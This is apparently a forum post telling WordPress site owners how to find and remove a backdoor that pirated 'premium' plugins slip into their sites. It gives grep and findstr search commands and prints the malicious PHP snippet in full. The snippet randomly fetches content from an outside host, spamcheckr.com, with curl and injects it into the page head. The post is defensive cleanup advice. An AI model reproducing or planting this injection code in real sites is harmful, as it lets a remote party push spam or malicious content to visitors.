You can check your folders by using a useful little command in the terminal if you have
grep (default on macs and many others but not pc). For pc use
findstr or download grep. If you don't have access to these files locally either download them or access them remotely with
ssh/telnes
The grep command I use is:
PHP Code:
grep -nr 'http://spamcheckr.com/l.php' /www/mysite/wp-content
(Don't forget to change /www/mysite/wp-content to the location of your wordpress site)
Using -nr options with grep it will output the exact line of the folder and file the code is on.
And for pc:
PHP Code:
findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content
Unfortunately it will probalby tell you it's on line one, but when you open the file you'll notice its a compressed file that is about 250 lines long. No problem though. Just open it with any text editor that has syntax highlighting turned on and look for this code:
PHP Code:
if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}
It will be the only code that shows up highlighted while all other code will remain greyed out because it's only there to trick you and doesn't actually do anything.
You can then delete that code.
You might also want to check on who added the file in the first place so just use the same grep command that you used above but instead use the name of the file that you found the malicious code in. So if the file name is includes/settings.php run the following in the command line:
PHP Code:
grep -nr 'includes/settings.php' /www/mysite/wp-content
Most likely the file was included in the main php script in the plugin root or theme functions.php.
It will look something like this
PHP Code:
include 'includes/settings.php';
You're safe to delete that line, if the file was all garbage code. I'd also look through that page to see if anything else was added that looks suspicious.
You're safest bet would be to discontinue from using the plugin entirely, but if you really need it you could run through some online virus checkers or just look through the plugin to be extra safe.
Most often these plugins come from sites like wplocker/themeok or other sites that claim they have premium plugins for free. Bottom line is, it's too good to be true and they want to rip you off so either pay for them or be ready for them to screw with you.
By the way it probably did other things beside that so I'd take several other security measures then just fixing the youtube hack.
![[Image: sG8E4t6yk1394078355.jpg]](http://img.Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)/files/sG8E4t6yk1394078355.jpg)
